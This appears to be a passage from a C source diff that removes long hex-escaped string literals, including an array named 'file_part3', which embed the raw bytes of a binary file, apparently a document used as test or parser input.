-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xce\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xea\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xea\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00" -"\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11" -"\x84\x9b\xfe\x12\x64\x68\x01\x01\x00\x5e\x84\x65\x01\x60\x84\x9b" -"\xfe\x61\x24\x03\x00\x07\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01" -"\x00\x61\x24\x01\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00" -"\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68\x01\x01" -"\x00\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x16" -"\x7f\x1b\x00\x00\x91\x1b\x00\x00\x10\x1c\x00\x00\x11\x1c\x00\x00" -"\x15\x1c\x00\x00\x5d\x1d\x00\x00\x5e\x1d\x00\x00\x68\x1d\x00\x00" -"\x20\x1e\x00\x00\x01\x1f\x00\x00\x62\x1f\x00\x00\x5e\x20\x00\x00" -"\x5f\x20\x00\x00\xa1\x20\x00\x00\x4e\x21\x00\x00\x71\x23\x00\x00" -"\xd9\x23\x00\x00\x63\x24\x00\x00\x0d\x26\x00\x00\x3b\x26\x00\x00" -"\x0d\x28\x00\x00\xde\x28\x00\x00\x57\x29\x00\x00\xbc\x29\x00\x00" -"\x7b\x2a\x00\x00\x40\x2b\x00\x00\xeb\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xdb\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x03\x24\x03\x12\x64\x68" -"\x01\x01\x00\x61\x24\x03\x00\x07\x00\x00\x03\x24\x03\x12\x64\x38" -"\xff\x00\x00\x61\x24\x03\x00\x13\x00\x00\x03\x24\x01\x0d\xc6\x05" -"\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11\x84\x9b\xfe\x12\x64\x68" -"\x01\x01\x00\x5e\x84\x65\x01\x60\x84\x9b\xfe\x61\x24\x01\x00\x19" -"\x40\x2b\x00\x00\x41\x2b\x00\x00\x69\x2b\x00\x00\x87\x2b\x00\x00" -"\x88\x2b\x00\x00\x9c\x2b\x00\x00\x13\x2c\x00\x00\x41\x2c\x00\x00" -"\x42\x2c\x00\x00\x5a\x2c\x00\x00\x20\x2d\x00\x00\x65\x2d\x00\x00" -"\x82\x2d\x00\x00\x30\x2e\x00\x00\x54\x2e\x00\x00\x15\x2f\x00\x00" -"\x60\x2f\x00\x00\xf0\x2f\x00\x00\x90\x30\x00\x00\x47\x31\x00\x00" -"\x48\x31\x00\x00\x33\x32\x00\x00\x34\x32\x00\x00\x30\x33\x00\x00" -"\x23\x34\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe7\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x03\x24\x01\x0d\xc6\x05" -"\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11\x84\x9b\xfe\x12\x64\x68" -"\x01\x01\x00\x5e\x84\x65\x01\x60\x84\x9b\x26\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x01\x12\x64\x10\xff\x00\x00\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x18" -"\x23\x34\x00\x00\x24\x34\x00\x00\xae\x34\x00\x00\xc8\x34\x00\x00" -"\xc9\x34\x00\x00\x33\x35\x00\x00\x34\x35\x00\x00\xee\x36\x00\x00" -"\x4f\x38\x00\x00\x9c\x38\x00\x00\xe3\x38\x00\x00\x62\x39\x00\x00" -"\x63\x39\x00\x00\x29\x3a\x00\x00\xda\x3b\x00\x00\xdb\x3b\x00\x00" -"\xe7\x3b\x00\x00\x76\x3c\x00\x00\x77\x3c\x00\x00\x86\x3c\x00\x00" -"\x97\x3d\x00\x00\x19\x3e\x00\x00\xca\x3e\x00\x00\xe4\x3f\x00\x00" 
-"\x06\x40\x00\x00\x07\x40\x00\x00\x08\x40\x00\x00\x09\x40\x00\x00" -"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xef\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07" -"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x1b" -"\x09\x40\x00\x00\x0a\x40\x00\x00\x19\x40\x00\x00\x1a\x40\x00\x00" -"\x2a\x41\x00\x00\x6b\x41\x00\x00\x6c\x41\x00\x00\x74\x41\x00\x00" -"\x75\x41\x00\x00\x81\x41\x00\x00\xe5\x41\x00\x00\xe6\x41\x00\x00" 
-"\xf0\x41\x00\x00\x1c\x42\x00\x00\x4a\x42\x00\x00\x4b\x42\x00\x00" -"\x67\x42\x00\x00\xa0\x42\x00\x00\xa1\x42\x00\x00\xac\x42\x00\x00" -"\x51\x43\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xd6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf7\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xc9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb3\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc4\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05" -"\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68" -"\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61" -"\x24\x03\x00\x0c\x00\x00\x03\x24\x03\x0f\x84\x68\x01\x11\x84\x98" -"\xfe\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x10\x00\x00" -"\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x65\x01\x11" -"\x84\x9b\xfe\x5e\x84\x65\x01\x60\x84\x9b\xfe\x61\x24\x03\x00\x07" -"\x00\x00\x03\x24\x01\x12\x64\x10\x0b\x00\x00\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x14" 
-"\x51\x43\x00\x00\x52\x43\x00\x00\x76\x43\x00\x00\xe2\x43\x00\x00" -"\xe3\x43\x00\x00\xf6\x43\x00\x00\xc7\x44\x00\x00\xc8\x44\x00\x00" -"\xe0\x44\x00\x00\x66\x45\x00\x00\x67\x45\x00\x00\x76\x45\x00\x00" -"\x46\x46\x00\x00\x98\x46\x00\x00\xbb\x46\x00\x00\x9a\x47\x00\x00" -"\x9b\x47\x00\x00\xa4\x47\x00\x00\xc7\x47\x00\x00\xe7\x47\x00\x00" -"\x4b\x49\x00\x00\x4c\x49\x00\x00\x62\x49\x00\x00\x6a\x4a\x00\x00" -"\x06\x4b\x00\x00\xaf\x4b\x00\x00\x21\x4c\x00\x00\xef\x4c\x00\x00" -"\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xfa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01" -"\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98" -"\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x1b" -"\xa4\x47\x00\x00\x4c\x49\x00\x00\x62\x49\x00\x00\xf0\x4c\x00\x00" -"\x17\x4d\x00\x00\x18\x4d\x00\x00\x29\x4d\x00\x00\xfe\x4e\x00\x00" -"\x0c\x4f\x00\x00\xe4\x4f\x00\x00\xee\x4f\x00\x00\xd7\x50\x00\x00" -"\xe4\x50\x00\x00\x3e\x52\x00\x00\x4f\x52\x00\x00\x87\x53\x00\x00" -"\x98\x53\x00\x00\x55\x54\x00\x00\x5d\x54\x00\x00\xf7\x55\x00\x00" -"\x0f\x56\x00\x00\x1a\x57\x00\x00\x32\x57\x00\x00\x04\x58\x00\x00" -"\x24\x58\x00\x00\x2a\x58\x00\x00\x2b\x58\x00\x00\x41\x58\x00\x00" -"\x42\x58\x00\x00\x4f\x58\x00\x00\x5c\x58\x00\x00\x6e\x58\x00\x00" -"\x6f\x58\x00\x00\x7d\x58\x00\x00\x8c\x58\x00\x00\xca\x58\x00\x00" -"\xdd\x58\x00\x00\xde\x58\x00\x00\xe0\x58\x00\x00\xe9\x58\x00\x00" -"\xee\x58\x00\x00\xf0\x58\x00\x00\xfb\x58\x00\x00\xfd\x58\x00\x00" -"\xff\x58\x00\x00\x05\x59\x00\x00\x1b\x59\x00\x00\x27\x59\x00\x00" -"\x3a\x59\x00\x00\x4f\x59\x00\x00\x50\x59\x00\x00\x5e\x59\x00\x00" -"\x75\x59\x00\x00\x76\x59\x00\x00\x77\x59\x00\x00\x86\x59\x00\x00" -"\x9e\x59\x00\x00\xa9\x59\x00\x00\x00\x5a\x00\x00\x07\x5a\x00\x00" -"\x52\x5a\x00\x00\x59\x5a\x00\x00\x9b\x5a\x00\x00\xa2\x5a\x00\x00" -"\xa3\x5a\x00\x00\xfd\x5a\x00\x00\x05\x5b\x00\x00\x06\x5b\x00\x00" -"\xac\x5b\x00\x00\xb3\x5b\x00\x00\xb4\x5b\x00\x00\xfc\xf5\xfc\xec" -"\xe5\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5" -"\xfc\xf5\xfc\xe1\xfc\xe1\xfc\xe1\xdc\xfc\xd7\xd2\xdc\xfc\xd7\xcd" -"\xc5\xd2\xc1\xd2\xe1\xdc\xd7\xfc\xbd\xd7\xfc\xd7\xb8\xfc\xc1\xb1" -"\xc1\xe1\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xfc\xf5\xdc\xfc\xf5\xdc\xfc" -"\xf5\xdc\x0c\x16\x68\xa5\x49\x73\x00\x36\x08\x81\x5d\x08\x81\x00" -"\x09\x16\x68\xa5\x49\x73\x00\x36\x08\x81\x06\x16\x68\x2e\x20\xb9" -"\x00\x00\x06\x16\x68\xa5\x49\x73\x00\x00\x0f\x15\x68\xae\x0f\x6a" -"\x00\x16\x68\xae\x0f\x6a\x00\x35\x08\x81\x09\x16\x68\xae\x0f\x6a" 
-"\x00\x35\x08\x81\x09\x16\x68\xae\x0f\x6a\x00\x36\x08\x81\x09\x16" -"\x68\x45\x6d\x47\x00\x36\x08\x81\x09\x16\x68\x45\x6d\x47\x00\x35" -"\x08\x81\x06\x16\x68\xae\x0f\x6a\x00\x00\x0c\x16\x68\x45\x6d\x47" -"\x00\x35\x08\xe9\x3e\x2a\x01\x00\x10\x16\x68\x45\x6d\x47\x00\x35" -"\x08\x81\x3e\x2a\x01\x43\x4a\x1c\x00\x00\x0d\x16\x68\x45\x6d\x47" -"\x00\x35\x08\x81\x43\x4a\x18\x00\x06\x16\x68\x45\x6d\x47\x00\x46" -"\xef\x4c\x00\x00\xf0\x4c\x00\x00\x17\x4d\x00\x00\x18\x4d\x00\x00" -"\x29\x4d\x00\x00\x26\x4e\x00\x00\xfd\x4e\x00\x00\xfe\x4e\x00\x00" -"\x0c\x4f\x00\x00\x6f\x4f\x00\x00\xe3\x4f\x00\x00\xe4\x4f\x00\x00" -"\xee\x4f\x00\x00\xd6\x50\x00\x00\xd7\x50\x00\x00\xe4\x50\x00\x00" -"\x3d\x52\x00\x00\x3e\x52\x00\x00\x4f\x52\x00\x00\x86\x53\x00\x00" -"\x87\x53\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xef\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xb4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc5\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x03\x24\x03\x0d" 
-"\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x5e" -"\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x04\x00\x00\x03\x24" -"\x03\x61\x24\x03\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01" -"\x68\x01\x00\x0f\x84\x65\x01\x11\x84\x9b\xfe\x5e\x84\x65\x01\x60" -"\x84\x9b\xfe\x61\x24\x03\x00\x13\x00\x00\x03\x24\x03\x0d\xc6\x05" -"\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11\x84\x98\xfe\x12\x64\x10" -"\xff\x00\x00\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x07" -"\x00\x00\x03\x24\x01\x12\x64\x68\x01\x01\x00\x61\x24\x01\x00\x07" -"\x00\x00\x03\x24\x03\x12\x64\x38\xff\x00\x00\x61\x24\x03\x00\x14" -; -char file_part3[]= -"\x87\x53\x00\x00\x98\x53\x00\x00\x54\x54\x00\x00\x55\x54\x00\x00" -"\x5d\x54\x00\x00\xf6\x55\x00\x00\xf7\x55\x00\x00\x0f\x56\x00\x00" -"\x19\x57\x00\x00\x1a\x57\x00\x00\x31\x57\x00\x00\x32\x57\x00\x00" -"\x41\x58\x00\x00\x42\x58\x00\x00\x4f\x58\x00\x00\x6e\x58\x00\x00" -"\x6f\x58\x00\x00\x7d\x58\x00\x00\xca\x58\x00\x00\xde\x58\x00\x00" -"\xef\x58\x00\x00\xf0\x58\x00\x00\xfb\x58\x00\x00\xee\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xee\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd8\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x00\x00" 
-"\x00\x00\x00\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\xe9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe9\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" -"\x00\x07\x00\x00\x03\x24\x03\x61\x24\x03\x67\x64\xa5\x49\x73\x00" -"\x00\x07\x00\x00\x03\x24\x03\x61\x24\x03\x67\x64\xae\x0f\x6a\x00" -"\x00\x10\x00\x00\x03\x24\x03\x0d\xc6\x05\x00\x01\xf8\x01\x00\x0f" -"\x84\xf8\x01\x11\x84\x08\xfe\x5e\x84\xf8\x01\x60\x84\x08\xfe\x61" -"\x24\x03\x00\x04\x00\x00\x03\x24\x03\x61\x24\x03\x00\x10\x00\x00" -"\x03\x24\x03\x0d\xc6\x05\x00\x01\x68\x01\x00\x0f\x84\x68\x01\x11" -"\x84\x98\xfe\x5e\x84\x68\x01\x60\x84\x98\xfe\x61\x24\x03\x00\x16" -"\xfb\x58\x00\x00\x1b\x59\x00\x00\x50\x59\x00\x00\x77\x59\x00\x00" -"\x86\x59\x00\x00\x9d\x59\x00\x00\x9e\x59\x00\x00\xa9\x59\x00\x00" -"\xdc\x59\x00\x00\xff\x59\x00\x00\x00\x5a\x00\x00\x07\x5a\x00\x00" -"\x51\x5a\x00\x00\x52\x5a\x00\x00\x59\x5a\x00\x00\x9a\x5a\x00\x00" -"\x9b\x5a\x00\x00\xa3\x5a\x00\x00\xd4\x5a\x00\x00\xfc\x5a\x00\x00" -"\xfd\x5a\x00\x00\x06\x5b\x00\x00\x42\x5b\x00\x00\xab\x5b\x00\x00" -"\xac\x5b\x00\x00\xb4\x5b\x00\x00\xe7\x5b\x00\x00\xf7\x00\x00\x00" -"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x00\x00\x00\x00\x00\x00" 